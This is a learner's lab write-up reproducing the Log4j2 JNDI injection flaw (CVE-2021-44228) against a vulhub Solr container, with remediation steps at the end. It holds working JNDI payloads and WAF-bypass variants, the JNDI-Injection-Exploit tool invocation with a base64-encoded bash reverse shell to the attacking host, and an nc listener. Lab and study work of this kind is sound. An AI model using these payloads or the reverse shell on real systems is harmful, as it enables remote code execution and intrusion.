[vulhub] Log4j2: CVE-2021-44228 vulnerability recurrence

References for this reproduction: https://www.freebuf.com/vuls/329984.html, https://cloud.tencent.com/developer/article/1944751、https://mp.weixin.qq.com/s/15zcLEk6_x2enszhim9afA.

principle

Apache Log4j is an open source project of Apache, and Apache Log4j2 is a Java-based logging tool. This tool rewrites the Log4j framework and introduces a number of rich features. We can control the destination of log information delivery to consoles, files, GUI components, etc. By defining the level of each log information, we can control the log generation process in more detail. The log framework is widely used in business system development to record log information.

Affect version

Apache Log4j 2.x <= 2.14.1

poc [I don't understand this for the time being, let's leave it for now]

${
    
    jndi:ldap://xxx.dnslog.cn/poc}

waf bypass

${
    
    ${
    
    ::-j}${
    
    ::-n}${
    
    ::-d}${
    
    ::-i}:${
    
    ::-r}${
    
    ::-m}${
    
    ::-i}://xxx.dnslog.cn/poc}
${
    
    ${
    
    ::-j}ndi:rmi://xxx.dnslog.cn/poc}
${
    
    jndi:rmi://xxx.dnslog.cn/poc}
${
    
    ${
    
    lower:jndi}:${
    
    lower:rmi}://xxx.dnslog.cn/poc}
${
    
    ${
    
    lower:${
    
    lower:jndi}}:${
    
    lower:rmi}://xxx.dnslog.cn/poc}
${
    
    ${
    
    lower:j}${
    
    lower:n}${
    
    lower:d}i:${
    
    lower:rmi}://xxx.dnslog.cn/poc}

RCE utilization

Target drone ------ http://192.168.88.128:8080/.

Shooting range environment construction

Shooting range: vulhub

opens the shooting range:
because my ubuntu has downloaded vulhub-master before, so I can enter the corresponding folder and start it to complete the local construction

ubuntu-gan@ubuntugan-virtual-machine:~$ cd  vulhub-master/log4j/CVE-2021-44228
ubuntu-gan@ubuntugan-virtual-machine:~/vulhub-master/log4j/CVE-2021-44228$  docker-compose up -d
Creating network "cve-2021-44228_default" with the default driver
Pulling solr (vulhub/solr:8.11.0)...
8.11.0: Pulling from vulhub/solr
43c265008fae: Already exists
af36d2c7a48: Already exists
2b7b4d10e1c1: Already exists
f264389d8f2f: Already exists
1a2c46e93f4a: Already exists
f9506bb322c0: Already exists
96f5dad14c2c: Already exists
c387eff49cc3: Downloading [>                                                  ] c387eff49cc3: Downloading [>                                                  ] c387eff49cc3: Downloading [>                                                  ] c387eff49cc3: Downloading [>                                                  ] c387eff49cc3: Downloading [>                                                  ] c387eff49cc3: Downloading [>                                                  ] c387eff49cc3: Downloading [=>                                                 ] c387eff49cc3: Downloading [=>                                                 ] c387eff49cc3: Downloading [=>                                                 ] c387eff49cc3: Downloading [=>                                                 ] c387eff49cc3: Pull complete
Digest: sha256:84255b20a2d134fc97bbb0fab7cb826087098ee594fcbc94c3a71def24d31003
Status: Downloaded newer image for vulhub/solr:8.11.0
Creating cve-2021-44228_solr_1 ... done

View the port as 8983

After successful opening, visit: http://192.168.88.128:8983/.

Revisit: http://192.168.88.128:8983/solr/admin/cores?action=1. [Question: How did they know to visit this url? ]

Supplementary answer "How did they know to visit this url?": http://www.ctfiot.com/16640.html#fancybox-14.
According to the official documents, we can know the calling parameters

of Collections. We can imagine JNDI injection through controllable Collections. The path is:

/solr/admin/collections?action=xxxxx

Vulnerability determination

Use dnslog

First visit to http://dnslog.cn/get a temporary domain name

Then use the obtained temporary domain name to construct the payload and directly access: http://192.168.88.128:8983/solr/admin/cores?action=${jndi:ldap://olorvf.dnslog.cn}.
[What does this payload mean? 】

After the visit, we view the dnslog.cn page, click the Refresh button to refresh, and we can see that there is a request access record, indicating that there is a log4j2 vulnerability. [I have used different browsers, and have accessed them with the browser that comes with Ubuntu. 】

exploit

Kali attack aircraft: 192.168.88.129.

JDNI injection tool

Download address: https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0.

Download the corresponding jar package. Copy the jar package to the kali virtual machine, or download it directly in kali [because I can't copy it from the host to kali, so I downloaded one in kali's Firefox browser].
Use the JNDI injection tool JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar.

Construct the payload:

bash -i > /dev/tcp/192.168.88.129/6969 0>&1

Execute in kali:java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c " {echo,YmFzaCAtaSA+IC9kZXYvdGNwLzE5Mi4xNjguODguMTI5LzY5NjkgMD4mMQ==}|{base64,-d}|{bash,-i}" -A 192.168.88.129

Got the rmi, ldap parameters:

┌──(kaligan㉿studygan)-[~/Downloads]
└─$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c " {echo,YmFzaCAtaSA+IC9kZXYvdGNwLzE5Mi4xNjguODguMTI5LzY5NjkgMD4mMQ==}|{base64,-d}|{bash,-i}" -A 192.168.88.129
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
[ADDRESS] >> 192.168.88.129
[COMMAND] >> bash -c  {
    
    echo,YmFzaCAtaSA+IC9kZXYvdGNwLzE5Mi4xNjguODguMTI5LzY5NjkgMD4mMQ==}|{
    
    base64,-d}|{
    
    bash,-i}
----------------------------JNDI Links---------------------------- 
Target environment(Build in JDK 1.7 whose trustURLCodebase is true):
rmi://192.168.88.129:1099/5ftwug
ldap://192.168.88.129:1389/5ftwug
Target environment(Build in JDK 1.8 whose trustURLCodebase is true):
rmi://192.168.88.129:1099/ggds3d
ldap://192.168.88.129:1389/ggds3d
Target environment(Build in JDK whose trustURLCodebase is false and have Tomcat 8+ or SpringBoot 1.2.x+ in classpath):
rmi://192.168.88.129:1099/xrvhnp

----------------------------Server Log----------------------------
2022-09-13 21:53:33 [JETTYSERVER]>> Listening on 0.0.0.0:8180
2022-09-13 21:53:33 [RMISERVER]  >> Listening on 0.0.0.0:1099
2022-09-13 21:53:34 [LDAPSERVER] >> Listening on 0.0.0.0:1389

listening port

Then open nc on the kali attack machine to monitor port 6969: [Why monitor 6969? Can you monitor other ports? ----- I understand this. It should be related to the previous bash statement payload. If the previous one is changed, then the listening port can be corresponding. 】

nc -lvnp 6969

Access the payload in the browser

payload：http://192.168.88.128:8983/solr/admin/cores?action=${jndi:rmi://192.168.88.129:1099/5ftwug}

Then I found that kali is listening and can execute shell commands.

close the range

Develop a good habit, remember to close after use: docker-compose down.

ubuntu-gan@ubuntugan-virtual-machine:~/vulhub-master/log4j/CVE-2021-44228$ docker-compose down
Stopping cve-2021-44228_solr_1 ... done
Removing cve-2021-44228_solr_1 ... done
Removing network cve-2021-44228_default

repair

 1. 升级最新版本
 2. 设置jvm参数"-Dlog4j2.formatMsgNoLookups=true"；
 3. 设置系统环境变量"FORMAT_MESSAGES_PATTERN_DIS-ABLE_LOOKU_PS"为"true"
 4. 关闭应用的网络外连。